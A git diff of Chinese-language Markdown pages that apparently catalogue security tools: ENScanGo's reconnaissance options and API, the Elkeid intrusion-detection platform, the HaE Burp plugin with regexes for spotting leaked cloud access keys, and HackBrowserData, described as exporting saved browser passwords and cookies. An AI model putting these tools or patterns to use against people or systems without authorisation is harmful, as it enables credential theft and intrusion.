-./enscan -n 小米 -type aqc,chinaz,qimai,coolapk
-```
-
-### 选项说明
-
-#### **field 获取字段**
-
-使用参数 `field`指定需要查询的信息，可指定多参数一起查询，方便快速收集
-
-```
--n 小米 -field icp,app
-```
-
-支持以下参数
-
-- `icp` 网站备案信息
-- `weibo` 微博
-- `wechat` 微信公众号
-- `app` 应用信息
-- `job` 招聘信息
-- `wx_app` 微信小程序
-- `copyright` 软件著作权
-- `supplier` 供应商信息（通过招标书确定）
-
-#### **type 获取字段**
-
-使用参数 `type`可以指定需要API数据源
-
-```
--n 小米 -type tyc
-```
-
-- `aqc`   爱企查
-- `tyc`   天眼查
-- `all`   全部查询
-- `aldzs` 阿拉丁 （仅小程序）
-- `coolapk` 酷安市场 （仅APP）
-- `qimai` 七麦数据（仅APP）
-- `chinaz` 站长之家（仅ICP备案）
-
-#### 完整参数
-
-| 参数              | 样例           | 说明                                   |
-| ----------------- | -------------- | -------------------------------------- |
-| -n                | 小米           | 关键词                                 |
-| -i                | 29453261288626 | 公司PID（自动识别类型）                |
-| -f                | file.txt       | 批量查询，文本按行分隔（可选PID模式）  |
-| -type             | aqc            | API类型                                |
-| -o                |                | 结果输出的文件夹位置(可选)             |
-| -is-merge         |                | 合并导出                               |
-| -invest           |                | 投资比例                               |
-| -field            | icp            | 获取字段信息                           |
-| -deep             | 1              | 递归搜索n层公司                        |
-| -hold             |                | 是否查询控股公司                       |
-| -supplier         |                | 是否查询供应商信息                     |
-| -branch           |                | 查询分支机构（分公司）信息             |
-| -is-branch        |                | 深度查询分支机构信息（数量巨大）       |
-| -api              |                | 是否API模式                            |
-| -client           |                | 客户端模式通道                         |
-| -debug            |                | 是否显示debug详细信息                  |
-| -is-show          |                | 是否展示信息输出                       |
-| -uncertain-invest |                | 包括未公示投资公司（无法确定占股比例） |
-| -is-group         |                | 查询关键词为集团                       |
-| -is-pid           |                | 批量查询文件是否为公司PID              |
-| -delay            |                | 每个请求延迟（S）-1为随机延迟1-5S      |
-| -proxy            |                | 设置代理                               |
-| -timeout          |                | 每个请求默认1（分钟）超时              |
-| -no-merge         |                | 批量查询【取消】合并导出               |
-| -v                |                | 版本信息                               |
-| -email            |                | 获取email信息                          |
-
-### API模式
-
-ENScanGo可使用API模式进行分布式部署，搭建API服务构建资产处理
-
-使用`rmq`作为任务队列组件，在redis存入任务信息，可分部署部署。数据可存储至mongodb进行调用分析。
-
-**api调用效果（前端开发中）**
-
-可使用 https://enscan.wgpsec.org/api/info 体验
-
-![image-20221028231744940](https://github.com/wgpsec/ENScan_GO/raw/master/README/image-20221028231744940.png)
-
-![image-20221028231815437](https://github.com/wgpsec/ENScan_GO/raw/master/README/image-20221028231815437.png)
-
-![image-20221028231831102](https://github.com/wgpsec/ENScan_GO/raw/master/README/image-20221028231831102.png)
-
-![image-20221028232013627](https://github.com/wgpsec/ENScan_GO/raw/master/README/image-20221028232013627.png)
-
-#### API说明
-
-在获取信息的内容在数据库内不存在时，会自动添加队列任务收集相关信息
-
-**状态信息**
-
-返回当前系统状态信息
-
-```
-GET /status
-```
-
-**获取信息**
-
-```
-GET /api/info?search=小米&invest=100&branch=true
-```
-
-| 参数      | 参数                 | 说明                       |
-| --------- | -------------------- | -------------------------- |
-| orgname   | 文本                 | 完整公司名称（二选一）     |
-| search    | 文本                 | 模糊匹配公司名称（二选一） |
-| type      | 文本，与命令参数一致 | 数据源                     |
-| field     | 文本，与命令参数一致 | 筛选指定信息               |
-| duplicate | true                 | 加上参数去重               |
-| depth     | 数字                 | 爬取几层公司 如 2 为孙公司 |
-| invest    | 数字                 | 筛选投资比例               |
-| holds     | true                 | 筛选控股公司               |
-| supplier  | true                 | 筛选供应商信息             |
-| branch    | true                 | 筛选分支信息               |
-| output    | true                 | 为true导出excel表格        |
-
-**股权穿透**
-
-返回投资、股东关联信息
-
-```
-GET /api/stockchart
-```
-
-| 参数      | 参数 | 说明             |
-| --------- | ---- | ---------------- |
-| orgname   | 文本 | 完整公司名称     |
-| search    | 文本 | 模糊匹配公司信息 |
-| duplicate | true | 是否去重         |
-
-**添加获取任务**
-
-添加新的任务信息
-
-```
-POST /api/info
-```
-
-| 参数      | 参数                 | 说明         |
-| --------- | -------------------- | ------------ |
-| orgname   | 文本                 | 完整公司名称 |
-| update    | true                 | 是否更新     |
-| type      | 文本，与命令参数一致 | 数据源       |
-| invest_rd | true                 | 不确定投资   |
-| branch    | true                 | 获取分支信息 |
-| field     | 文本，与命令参数一致 | 筛选字段     |
-| invest    | 数字                 | 投资信息     |
-
-#### 启动部署
-
-**golang 版本依赖**
-```
-go >= 1.17
-```
-
-然后我们需要对配置文件进行修改，加入数据库连接信息，与common同级加入以下配置
-
-```yaml
-api:
-  server: "127.0.0.1" # redis地址
-  mongodb: "mongodb://user:pass@127.0.0.1:27017" # mongodb 连接信息
-  redis: "redis_password" # redis 密码
-  port: "8080" # 启动API端口
-```
-
-mongodb数据库初始化配置
-
-```
-db.createCollection("app");
-db.createCollection("branch");
-db.createCollection("copyright");
-db.createCollection("enterprise_info");
-db.getCollection("enterprise_info").createIndex({
-    name: "hashed"
-}, {
-    name: "name"
-});
-db.createCollection("holds");
-db.createCollection("icp");
-db.createCollection("infos");
-db.createCollection("invest");
-db.createCollection("job");
-db.createCollection("partner");
-db.createCollection("supplier");
-db.createCollection("wechat");
-db.createCollection("weibo");
-db.createCollection("wx_app");
-```
-
-**API模式**
-
-启动API模式将在配置端口监听，并启动api服务，可通过api服务进行调用读取数据
-
-在此场景下无需配置cookie信息
-
-```
-./enscan --api
-```
-
-**客户端模式**
-
-可作为部署节点，读取任务队列自动读取信息写入数据库
-
-```
-./enscan --client
-```
-
-<!--auto_detail_active_begin_e1c6fb434b6f0baf6912c7a1934f772b-->
-## 项目相关
-
-
-## 最近更新
-
-#### [v0.0.15] - 2023-08-16
-
-**更新**  
-- 修复AQC查询问题  
-- 当ENSCAN无法正常访问网站可尝试使用-proxy参数挂上代理
-
-#### [v0.0.14] - 2023-07-22
-
-**更新**  
-- 修复TYC查询BUG，增加tycid参数，获取方式详见README  
-- 修复qimai查询问题  
-
-**其他**  
-- 配置文件更新升级到v0.4，请重新生成  
-- 当ENSCAN无法正常访问网站可尝试使用-proxy参数挂上代理  
-- 当ENSCAN查询时有问题，可以使用--debug进行排查
-
-#### [v0.0.12] - 2023-07-04
-
-**修复**  
-- 修复天眼查查询BUG  
-- 优化延迟选项
-
-#### [v0.0.9] - 2023-02-13
-
-**bugfix**  
-- 修复JSON导出问题  
-- 修复天眼查日期问题  
-- 修复阿拉丁导出bug  
-
-**new**  
-- 增加只在终端显示不导出文件
-
-#### [v0.0.8] - 2023-02-12
-
-**更新**  
-- 增加JSON导出功能
-
-<!--auto_detail_active_end_f9cf7911015e9913b7e691a7a5878527-->
diff --git a/detail/Elkeid.md b/detail/Elkeid.md
index 7ffd15759..4db22e6a0 100644
--- a/detail/Elkeid.md
+++ b/detail/Elkeid.md
@@ -7,175 +7,47 @@
 ![Time](https://img.shields.io/badge/Join-20210422-green)
 <!--auto_detail_badge_end_fef74f2d7ea73fcc43ff78e05b1e7451-->
 
-[English](https://github.com/bytedance/Elkeid/blob/main/README.md) | 简体中文
-
-**Elkeid** 是一款可以满足 **主机，容器与容器集群，Serverless** 等多种工作负载安全需求的开源解决方案，源于字节跳动内部最佳实践。
-
-随着企业的业务发展，多云、云原生、多种工作负载共存的情况愈发凸显，我们希望可以有一套方案可以满足不同工作负载下的安全需求，因此 **Elkeid** 诞生了。
-
-
-## Introduction
-
-Elkeid 具备以下主要能力：
-
-* **Elkeid** 不仅具备传统的 **HIDS(Host Intrusion Detection System)** 的对于主机层入侵检测和恶意文件识别的能力，且对容器内的恶意行为也可以很好的识别，部署在宿主机即可以满足宿主机与其上容器内的反入侵安全需求，并且 **Elkeid** 底层强大的内核态数据采集能力可以满足大部分安全运营人员对于主机层数据的渴望。
-
-* 对于运行的业务 **Elkeid** 具备 **RASP** 能力可以注入到业务进程内进行反入侵保护，不仅运维人员不需要再安装一个 Agent，业务也无需重启。
-
-* 对于 **K8s** 本身 **Elkeid** 支持接入**K8s Audit Log** 对 **K8s** 系统进行入侵检测和风险识别。
-
-* **Elkeid** 的规则引擎 **Elkeid HUB** 也可以很好的和外部多系统进行联动对接。
-
-**Ekeid** 将这些能力都很好的融合在一个平台内，满足不同工作负载的复杂安全需求的同时，还能实现多组件能力关联，更难得的是每个组件均经过字节跳动海量数据和多年的实战检验。
-
-
-
-## Elkeid Community Edition Description
-
-需要注意的是 **Elkeid** **开源版本** 和完整版本存在差异，目前已开源的能力主要包括：
-
-* 全部端上能力，即端上数据/资产/部分采集能力，内核态数据采集能力，RASP 探针部分等，并与字节跳动内部版本一致；
-* 全部接入层能力，即 Agent Center，服务发现等，并与字节跳动内部版本一致；
-* 提供社区版规则引擎即 Elkeid HUB，并配套少量策略作为示例使用；
-* 提供社区版 Elkeid Console 与部分配套能力。
-
-因此需要具备完整的反入侵与风险感知能力，还需要自行基于 Elkeid HUB 进行策略构建和对 Elkeid 采集的数据进行二次加工等工作。
-
 
+Elkeid是一个云原生的基于主机的安全(入侵检测与风险识别)解决方案。
 
 ## Elkeid Architecture
-
-<img src="https://github.com/bytedance/Elkeid/raw/main/server/docs/server_new.png"/>
+<img src="https://github.com/bytedance/Elkeid/blob/main/server/docs/server.png">
 
 ##  Elkeid Host Ability
-* **[Elkeid Agent](https://github.com/bytedance/Elkeid/blob/main/agent/README-zh_CN.md)** 用户态 Agent，负责管理各个端上能力组件并与 **Elkeid Agent Center** 通信
-* **[Elkeid Driver](https://github.com/bytedance/Elkeid/blob/main/driver/README-zh_CN.md)** 负责 Linux Kernel 层采集数据，兼容容器，并能够检测常见 Rootkit
-* **[Elkeid RASP](https://github.com/bytedance/Elkeid/blob/main/rasp)** 支持 CPython、Golang、JVM、NodeJS、PHP 的运行时数据采集探针，支持动态注入到运行时
-* **Elkeid Agent Plugin List**
-  * [Driver Plugin](https://github.com/bytedance/Elkeid/blob/main/plugins/driver): 负责与 **Elkeid Driver** 通信，处理其传递的数据等
-  * [Collector Plugin](https://github.com/bytedance/Elkeid/blob/main/plugins/collector): 负责端上的资产/关键信息采集工作，如用户，定时任务，包信息等
-  * [Journal Watcher](https://github.com/bytedance/Elkeid/blob/main/plugins/journal_watcher): 负责监测systemd日志的插件，目前支持ssh相关日志采集与上报
-  * [Scanner Plugin](https://github.com/bytedance/Elkeid/blob/main/plugins/scanner): 负责在端上进行静态检测恶意文件的插件，支持 Yara
-  * [RASP Plugin](https://github.com/bytedance/Elkeid/blob/main/rasp/plugin): 分析系统进程运行时，上报运行时信息，处理下发的 Attach 指令，收集各个探针上报的数据
-  * [Baseline Plugin](https://github.com/bytedance/Elkeid/blob/main/plugins/baseline): 负责在端上进行基线风险识别的插件
-* [**Elkeid 数据说明**](https://github.com/bytedance/Elkeid/blob/main/server/docs/ElkeidData.xlsx)
-* [**Elkeid 数据接入**](https://github.com/bytedance/Elkeid/blob/main/elkeidup/raw_data_usage_tutorial/raw_data_usage_tutorial-zh_CN.md)
-
-
-## Elkeid Backend Ability
-* **[Elkeid AgentCenter](https://github.com/bytedance/Elkeid/blob/main/server/agent_center)** 负责与 Agent 进行通信并管理 Agent 如升级，配置修改，任务下发等
-* **[Elkeid ServiceDiscovery](https://github.com/bytedance/Elkeid/blob/main/server/service_discovery)** 后台中的各组件都会向该组件定时注册、同步服务信息，从而保证各组件相互可见，便于直接通信
-* **[Elkeid Manager](https://github.com/bytedance/Elkeid/blob/main/server/manager)** 负责对整个后台进行管理，并提供相关的查询、管理接口
-* **[Elkeid Console](https://github.com/bytedance/Elkeid/blob/main/server/web_console)** Elkeid 前端部分
-* **[Elkeid HUB](https://github.com/bytedance/Elkeid-HUB)**  策略引擎
-
-
-
-## Elkeid Function List
-
-| 功能                 | Elkeid Community Edition | Elkeid Enterprise Edition |
-|--------------------|--------------------------|---------------------------|
-| Linux 数据采集能力       | :white_check_mark:       | :white_check_mark:        |
-| RASP 探针能力          | :white_check_mark:       | :white_check_mark:        |
-| K8s Audit Log 采集能力 | :white_check_mark:       | :white_check_mark:        |
-| Agent 控制面          | :white_check_mark:       | :white_check_mark:        |
-| 主机状态与详情            | :white_check_mark:       | :white_check_mark:        |
-| 勒索诱饵               | :ng_man:                 | :white_check_mark:        |
-| 资产采集               | :white_check_mark:       | :white_check_mark:        |
-| 高级资产采集             | :ng_man:                 | :white_check_mark:        |
-| 容器集群资产采集           | :white_check_mark:       | :white_check_mark:        |
-| 暴露面与脆弱性分析          | :ng_man:                 | :white_check_mark:        |
-| 主机/容器 基础入侵检测       | `少量样例`                   | :white_check_mark:        |
-| 主机/容器 行为序列入侵检测     | :ng_man:                 | :white_check_mark:        |
-| RASP 基础入侵检测        | `少量样例`                   | :white_check_mark:        |
-| RASP 行为序列入侵检测      | :ng_man:                 | :white_check_mark:        |
-| K8S 基础入侵检测         | `少量样例`                   | :white_check_mark:        |
-| K8S 行为序列入侵检测       | :ng_man:                 | :white_check_mark:        |
-| K8S 威胁分析           | :ng_man:                 | :white_check_mark:        |
-| 告警溯源(行为溯源)         | :ng_man:                 | :white_check_mark:        |
-| 告警溯源(驻留溯源)         | :ng_man:                 | :white_check_mark:        |
-| 告警白名单              | :white_check_mark:       | :white_check_mark:        |
-| 多告警聚合能力            | :ng_man:                 | :white_check_mark:        |
-| 威胁处置(进程)           | :ng_man:                 | :white_check_mark:        |
-| 威胁处置(网络)           | :ng_man:                 | :white_check_mark:        |
-| 威胁处置(文件)           | :ng_man:                 | :white_check_mark:        |
-| 文件隔离箱              | :ng_man:                 | :white_check_mark:        |
-| 漏洞检测               | `少量情报`                   | :white_check_mark:        |
-| 漏洞情报热更新            | :ng_man:                 | :white_check_mark:        |
-| 基线检查               | `少量基线`                   | :white_check_mark:        |
-| RASP 热补丁           | :ng_man:                 | :white_check_mark:        |
-| 病毒扫描               | :white_check_mark:       | :white_check_mark:        |
-| 用户行为日志分析           | :ng_man:                 | :white_check_mark:        |
-| 插件管理               | :white_check_mark:       | :white_check_mark:        |
-| 系统监控               | :white_check_mark:       | :white_check_mark:        |
-| 系统管理               | :white_check_mark:       | :white_check_mark:        |
-| Windows 支持         | :ng_man:                 | :white_check_mark:        |
-| 蜜罐                 | :ng_man:                 | :oncoming_automobile:     |
-| 主动防御               | :ng_man:                 | :oncoming_automobile:     |
-| 云查杀                | :ng_man:                 | :oncoming_automobile:     |
-| 防篡改                | :ng_man:                 | :oncoming_automobile:     |
-
-
-
-## Front-end Display (Community Edition)
-**安全概览**
-<img src="https://github.com/bytedance/Elkeid/raw/main/png/console0.png" style="float:left;"/>
-
-**容器集群安全告警**
-
-<img src="https://github.com/bytedance/Elkeid/raw/main/png/console1.png" style="float:left;"/>
-
-**容器集群工作负载信息**
-
-<img src="https://github.com/bytedance/Elkeid/raw/main/png/console2.png" style="float:left;"/>
-
-****
-
-**主机概览**
-
-<img src="https://github.com/bytedance/Elkeid/raw/main/png/console3.png" style="float:left;"/>
-
-**资产指纹**
-
-<img src="https://github.com/bytedance/Elkeid/raw/main/png/console4.png" style="float:left;"/>
-
-**安全告警**
-
-<img src="https://github.com/bytedance/Elkeid/raw/main/png/console5.png" style="float:left;"/>
-
-**漏洞信息**
-
-<img src="https://github.com/bytedance/Elkeid/raw/main/png/console6.png" style="float:left;"/>
-
-**基线检查**
-
-<img src="https://github.com/bytedance/Elkeid/raw/main/png/console7.png" style="float:left;"/>
-
-**病毒扫描**
-
-<img src="https://github.com/bytedance/Elkeid/raw/main/png/console8.png" style="float:left;"/>
-
-**后端监控**
-
-<img src="https://github.com/bytedance/Elkeid/raw/main/png/console9.png" style="float:left;"/>
-
-**后端服务监控**
-
-<img src="https://github.com/bytedance/Elkeid/raw/main/png/console10.png" style="float:left;"/>
-
-
-
-## Console User Guide
-* **[ELkeid Console User Guide](https://github.com/bytedance/Elkeid/blob/main/server/docs/console_tutorial/Elkeid_Console_manual.md)**
-
-## Quick Start
-* **[通过Elkeidup部署](https://github.com/bytedance/Elkeid/blob/main/elkeidup/README-zh_CN.md)**
+<img src="https://github.com/bytedance/Elkeid/blob/main/Ability_1.png">
 
+* **[Elkeid Agent](https://github.com/bytedance/Elkeid/blob/main/agent/README-zh_CN.md)** 用户态 Agent，负责管理各个端上能力组件，与 **Elkeid Server** 通讯
+* **[Elkeid Driver](https://github.com/bytedance/Elkeid/blob/main/driver/README-zh_CN.md)** 在 Linux Kernel 层采集数据的组件，兼容容器环境，并能够提供Rootkit检测能力。与Elkeid Agent管理的Driver插件通讯
+* **[Elkeid RASP](https://github.com/bytedance/Elkeid/tree/main/rasp)** 支持 CPython、Golang、JVM、NodeJS 的运行时数据采集探针，支持动态注入到运行时。
+* **Elkeid Agent Plugin List**
+  * [Driver Plugin](https://github.com/bytedance/Elkeid/blob/main/agent/driver/README-zh_CN.md): 负责与**Elkeid Driver**通信，处理其传递的数据等
+  * [Collector Plugin](https://github.com/bytedance/Elkeid/blob/main/agent/collector/README-zh_CN.md): 负责端上的资产/关键信息采集工作，如用户，定时任务，包信息等等
+  * [Journal Watcher](https://github.com/bytedance/Elkeid/blob/main/agent/journal_watcher/README-zh_CN.md): 负责监测systemd日志的插件，目前支持ssh相关日志采集与上报
+  * [Scanner Plugin](https://github.com/bytedance/Elkeid/blob/main/agent/scanner/README-zh_CN.md): 负责在端上进行静态检测恶意文件的插件，目前支持yara
+  * RASP Plugin: 负责管理RASP组件以及处理RASP采集的数据，还未开源
+  
+以上组件可以提供以下数据：
+<img src="https://github.com/bytedance/Elkeid/blob/main/data_index.png"/>
+<img src="https://github.com/bytedance/Elkeid/blob/main/data.png"/>
+
+## [Elkeid Backend Ability](https://github.com/bytedance/Elkeid/blob/main/server/README-zh_CN.md)
+* **[Elkeid AgentCenter](https://github.com/bytedance/Elkeid/tree/main/server/agent_center)** 负责与Agent进行通信，采集Agent数据并简单处理后汇总到消息队列集群，同时也负责对Agent进行管理包括Agent的升级，配置修改，任务下发等
+* **[Elkeid ServiceDiscovery](https://github.com/bytedance/Elkeid/tree/main/server/service_discovery)** 后台中的各个服务模块都需要向该组件定时注册、同步服务信息，从而保证各个服务模块中的实例相互可见，便于直接通信
+* **[Elkeid Manager](https://github.com/bytedance/Elkeid/tree/main/server/manager)** 负责对整个后台进行管理，并提供相关的查询、管理接口
+
+
+## Elkeid Advantage
+当前开源模块缺少规则引擎和检测功能，还不能提供入侵检测的能力。 但是目前开源的部分可以轻松地与其他的HIDS/NIDS/XDR解决方案进行集成，或者自己对采集的数据进行数处理实现自己的需求，Elkeid 有以下主要优势：
+
+* **性能优异**：端上能力借助Elkeid Driver与很多定制开发，性能极佳
+* **为入侵检测而生**：数据采集以高强度对抗为前提，对如Kernel Rootkit，提权，无文件攻击等众多高级对抗场景均有针对性数据采集
+* **支持云原生**：从端上能力到后台部署都支持云原生环境
+* **百万级生产环境验证**：整体经过内部百万级验证，从端到Server，稳定性与性能经过考验，Elkeid不仅仅是一个PoC，是生产级的；开源版本即内部Release Version
+* **二次开发友好**：Elkeid 方便二次开发与定制化需求增加
 
 <!--auto_detail_active_begin_e1c6fb434b6f0baf6912c7a1934f772b-->
 ## 项目相关
 
-- 2021-11-10 发布文章[《抗击黑客：如何利用Elkeid构建入侵检测能力》](https://mp.weixin.qq.com/s/iwvkIdgMblVOH7Agg_wXtQ)
 
 ## 最近更新
 
diff --git a/detail/HaE.md b/detail/HaE.md
index 96eff6248..04e5a04a2 100644
--- a/detail/HaE.md
+++ b/detail/HaE.md
@@ -3,47 +3,52 @@
 ![Language](https://img.shields.io/badge/Language-Java-blue)
 ![Author](https://img.shields.io/badge/Author-gh0stkey-orange)
 ![GitHub stars](https://img.shields.io/github/stars/gh0stkey/HaE.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V2.4.6-red)
+![Version](https://img.shields.io/badge/Version-V2.1.2-red)
 ![Time](https://img.shields.io/badge/Join-20210120-green)
 <!--auto_detail_badge_end_fef74f2d7ea73fcc43ff78e05b1e7451-->
 
 
-## 项目介绍
+# HaE - Highlighter and Extractor
 
-**HaE**是基于 `BurpSuite Java插件API` 开发的请求高亮标记与信息提取的辅助型框架式插件，该插件可以通过自定义正则的方式匹配响应报文或请求报文，并对满足正则匹配的报文进行信息高亮与提取。
+核心功能作者: [@EvilChen](https://github.com/gh0stkey)
 
-现代化Web应用走上前后端分离开发模式，这就导致在日常测试时候会有许多的流量，如果你想要尽可能全面的对一个Web应用进行测试评估，将花费大量精力浪费在无用的报文上；**HaE的出现正是为了解决这一类似场景**，借助HaE你可以**有效的减少**测试的时间，将更多的精力放在**有价值、有意义**的报文上，**提高漏洞挖掘效率**。
+架构作者: [@0chencc](https://github.com/0Chencc)
 
-**注**: 要想灵活的使用`HaE`，你需要掌握正则表达式阅读、编写、修改能力；由于`Java`正则表达式的库并没有`Python`的优雅或方便，所以HaE要求使用者必须用`()`将所需提取的表达式内容包含；例如你要匹配一个**Shiro应用**的响应报文，正常匹配规则为`rememberMe=delete`，如果你要提取这段内容的话就需要变成`(rememberMe=delete)`。
+## 公共规则网站
 
-## 使用方法
+https://gh0st.cn/HaE/
 
-插件装载: `Extender - Extensions - Add - Select File - Next`
+## 介绍
+
+**HaE**是基于 `BurpSuite` 插件 `JavaAPI` 开发的请求高亮标记与信息提取的辅助型插件。
+
+![-w1070](https://github.com/gh0stkey/HaE/raw/master/images/16000706401522.jpg)
 
-初次装载`HaE`会初始化配置文件，默认配置文件内置一个正则: `Email`，初始化的配置文件会放在的`/用户根目录/.config/HaE/`目录下。
+该插件可以通过自定义正则的方式匹配**响应报文或请求报文**，可以自行决定符合该自定义正则匹配的相应请求是否需要高亮标记、信息提取。
 
-![-w477](https://github.com/gh0stkey/HaE/raw/master/images/show_config.png)
+**注**: `HaE`的使用，对测试人员来说需要基本的正则表达式基础，由于`Java`正则表达式的库并没有`Python`的优雅或方便，在使用正则的，HaE要求使用者必须使用`()`将所需提取的表达式内容包含；例如你要匹配一个**Shiro应用**的响应报文，正常匹配规则为`rememberMe=delete`，如果你要提取这段内容的话就需要变成`(rememberMe=delete)`。
+
+## 使用方法
+
+插件装载: `Extender - Extensions - Add - Select File - Next`
 
-除了初始化的配置文件外，还有`Setting.yml`，该文件用于存储配置文件路径与排除后缀名；`HaE`支持自定义配置文件路径，你可以通过点击`Select File`按钮进行选择自定义配置文件。
+初次装载`HaE`会初始化配置文件，默认配置文件内置一个正则: `Email`，初始化的配置文件会放在与`BurpSuite Jar`包同级目录下。
 
-## 优势特点
+除了初始化的配置文件外，还有`Setting.yml`，该文件用于存储配置文件路径；`HaE`支持自定义配置文件路径，你可以通过点击`Select File`按钮进行选择自定义配置文件。
 
-1. **精细化配置项**：高自由度配置更适配精细化场景需求；
-2. **简洁可视界面**：简洁的可视化界面让你更加清晰了解HaE的各项配置，操作更轻松，使用更简单；
-3. **颜色升级算法**：内置颜色升级算法，避免“屠龙者终成恶龙”场景，突出最具价值的请求；
-4. **标签化规则项**：标签化你的正则规则，让规则可分类，让管理更轻松；
-5. **数据集合面板**：将所有匹配数据集合到Databoard中，使得测试、梳理更高效；
-6. **高亮标记一体**：在Proxy - History页面你可以通过颜色高亮与Comment判断请求价值；
-7. **实战化官方库**：基于实战化场景、案例进行输出的官方规则库，提升测试实战性；
-8. **配置文件易读**：配置文件使用YAML格式存储，更加便于阅读与修改。
+![-w477](https://github.com/gh0stkey/HaE/raw/master/images/16000710069404.jpg)
 
-| 界面名称                  | 界面展示                                              |
-| ------------------------- | ----------------------------------------------------- |
-| Rules（规则信息管理）     | <img src="https://github.com/gh0stkey/HaE/raw/master/images/rules.png" style="width: 80%" />     |
-| Config（配置信息管理）    | <img src="https://github.com/gh0stkey/HaE/raw/master/images/config.png" style="width: 80%" />    |
-| Databoard（数据集合面板） | <img src="https://github.com/gh0stkey/HaE/raw/master/images/databoard.png" style="width: 80%" /> |
+## 插件优点
 
+1. 多选项自定义控制适配需求
+2. 多颜色高亮分类，将BurpSuite的所有高亮颜色集成: `red, orange, yellow, green, cyan, blue, pink, magenta, gray`
+3. **颜色升级算法**: 利用下标的方式进行优先级排序，当满足2个同颜色条件则以优先级顺序上升颜色（例如: **两个正则，颜色为橘黄色，该请求两个正则都匹配到了，那么将升级为红色**）
+4. 配置文件采用YAML格式存储，更加便于阅读和修改
+5. 内置简单缓存，在“多正则、大数据”的场景下减少卡顿现象
+6. **支持标签分页**，点击`...`即可添加新的标签页，对着标签页右键即可删除
+7. 高亮信息添加的同时添加Comment，便于查找请求
 
+![-w477](https://github.com/gh0stkey/HaE/raw/master/images/16000720732851.jpg)
 
 ## 实际使用
 
@@ -53,50 +58,48 @@
 
 访问该地址，在`Proxy - HTTP History`中可以看见高亮请求，响应标签页中含有`MarkINFO`标签，其中将匹配到的信息提取了出来。
 
-![-w1047](https://github.com/gh0stkey/HaE/raw/master/images/16000720732854.png)
+![-w1047](https://github.com/gh0stkey/HaE/raw/master/images/16000720732854.jpg)
 
 
-<!--auto_detail_active_begin_e1c6fb434b6f0baf6912c7a1934f772b-->
-## 项目相关
+## 正则优化
 
+有些正则在实战应用场景中并不理想
 
-## 最近更新
+在正则匹配手机号、身份证号码的时候（纯数字类）会存在一些误报（这里匹配身份证号码无法进行校验，误报率很高），但手机号处理这一块可以解决: 
+
+原正则: 
 
-#### [v2.4.6] - 2023-02-22
+```
+1[3-9]\d{9}
+```
 
-**更新**  
-- 加入多线程对数据进行匹配和提取，减少卡顿现象  
-- 变更配置文件更新地址为jsdelivr的CDN节点地址，优化国内用户体验
+误报场景: `12315188888888123`，这时候会匹配到`15188888888`，而实际上这一段并不是手机号，所以修改正则为: 
 
-#### [v2.4.5] - 2022-12-18
+```
+[^0-9]+(1[3-9]\d{9})[^0-9]+
+```
 
-**更新**  
-- 在线更新配置信息功能添加提示框, 防止用户误触导致配置被更新  
-- 数据聚合查询面板添加支持通配符域名查找  
-- 数据聚合查询面板添加清空数据功能, 便于用户查看最新数据  
-- 新增规则作用域: any header(请求与响应头)/any body(请求与响应主体)
+也就是要求匹配的手机号前后不能为0-9的数字。
 
-#### [v2.4.2] - 2022-07-15
+## 实战用法
 
-**更新**  
-- 由于原按钮的鼠标点击监听不灵敏，所以将该监听修改为动作监听  
-- 在 issue 发布「HaE公共规则」征集活动  
-- 公共规则库新增7条规则
+1. CMS指纹识别，Discuz正则: `(Powered by Discuz!)`
+2. OSS对象存储信息泄露，正则: `([A|a]ccess[K|k]ey[I|i]d|[A|a]ccess[K|k]ey[S|s]ecret)`
+3. 内网地址信息提取，正则: `(?:10\.\d{1,3}\.\d{1,3}\.\d{1,3})|(?:172\.(?:(?:1[6-9])|(?:2\d)|(?:3[01]))\.\d{1,3}\.\d{1,3})|(?:192\.168\.\d{1,3}\.\d{1,3})`
+4. 实战插件关联搭配，漏洞挖掘案例: https://mp.weixin.qq.com/s/5vNn7dMRZBtv0ojPBAHV7Q
 
-#### [v2.4.1] - 2022-06-29
+...还有诸多使用方法等待大家去发掘。
 
-**更新**  
-- 采用全局ArrayList的方式遍历删除Tab，以此应对BurpSuite缓存机制导致的MarkInfo UI错误展示  
-- 移除Select File自定义选择配置文件功能，固定配置文件路径，不再支持自定义  
-- 新增Online Update功能，单击按钮可在线更新官方配置库
+<!--auto_detail_active_begin_e1c6fb434b6f0baf6912c7a1934f772b-->
+## 项目相关
 
-#### [v2.4] - 2022-06-23
 
-**更新**  
-- 修复规则导入问题  
-- 配置文件初始化默认路径切换到用户根目录/.config/HaE/目录下  
-- 新增Databoard功能用于HaE规则匹配数据集中化查询  
-- 优化README文档，去除非必要内容，直观展示项目相关信息  
-- 发布HaE项目Logo及项目口号：赋能白帽，高效作战！提升项目品牌影响力与辨识度
+## 最近更新
+
+#### [v2.1.2] - 2021-10-22
+**优化**  
+- 修复/规避一些微不足道的BUG  
+- 优化/合并冗余代码  
+- 补2.1.1未说明的功能：排除后缀不再仅仅作用于请求报文，也会与Burp的MIME进行匹配作用响应报文
 
 <!--auto_detail_active_end_f9cf7911015e9913b7e691a7a5878527-->
diff --git a/detail/HackBrowserData.md b/detail/HackBrowserData.md
index 18fe19792..5fa4681b9 100644
--- a/detail/HackBrowserData.md
+++ b/detail/HackBrowserData.md
@@ -3,88 +3,79 @@
 ![Language](https://img.shields.io/badge/Language-Golang-blue)
 ![Author](https://img.shields.io/badge/Author-moonD4rk-orange)
 ![GitHub stars](https://img.shields.io/github/stars/moonD4rk/HackBrowserData.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V0.4.4-red)
+![Version](https://img.shields.io/badge/Version-V0.3.6-red)
 ![Time](https://img.shields.io/badge/Join-20201221-green)
 <!--auto_detail_badge_end_fef74f2d7ea73fcc43ff78e05b1e7451-->
 
-<div align="center">
-<img src="https://github.com/moonD4rk/HackBrowserData/raw/master/LOGO.png" alt="hack-browser-data logo" />
-</div>
-
 
 # HackBrowserData
 
-`HackBrowserData` 是一个浏览器数据（密码|历史记录|Cookie|书签|信用卡|下载记录|localStorage|浏览器插件）的导出工具，支持全平台主流浏览器。
+hack-browser-data 是一个浏览器数据（密码 | 历史记录 | Cookie | 书签 | 信用卡 | 下载记录）的导出工具，支持全平台主流浏览器。
 
 
-> 免责声明：此工具仅限于安全研究，用户承担因使用此工具而导致的所有法律和相关责任！作者不承担任何法律责任！
+> 特别声明：此工具仅限于安全研究，用户承担因使用此工具而导致的所有法律和相关责任！作者不承担任何法律责任！
 
 ## 各平台浏览器支持情况
 
 ### Windows
 
-| 浏览器                | 密码  | Cookie | 书签  | 历史记录 |
-|:-------------------|:---:|:------:|:---:|:----:|
-| Google Chrome      |  ✅  |   ✅    |  ✅  |  ✅   |
